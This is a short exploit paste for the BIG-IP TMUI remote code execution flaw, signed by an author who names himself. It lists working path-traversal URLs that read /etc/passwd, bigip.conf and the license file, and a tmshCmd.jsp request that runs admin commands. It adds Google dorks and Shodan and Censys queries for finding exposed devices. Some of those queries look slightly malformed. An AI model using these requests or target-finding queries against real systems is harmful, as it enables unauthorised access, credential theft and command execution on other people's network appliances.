In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse
inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"
~~ Try use the following queries for shodan:
1. F5-login-pages
2. www-authenticate: Basic realm:BIG-IP
3. BigIP / BIG-IP
4. htt.favicon.hash:-335242539
5. http.title:"BIG-IP&req:- Redirect"
~~ Try use the following queries for censys:
1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
2.433.https.get.title:"BIG-IP&req:- Redirect" ##Hello##
i'm Rizki Ardian
how are you today??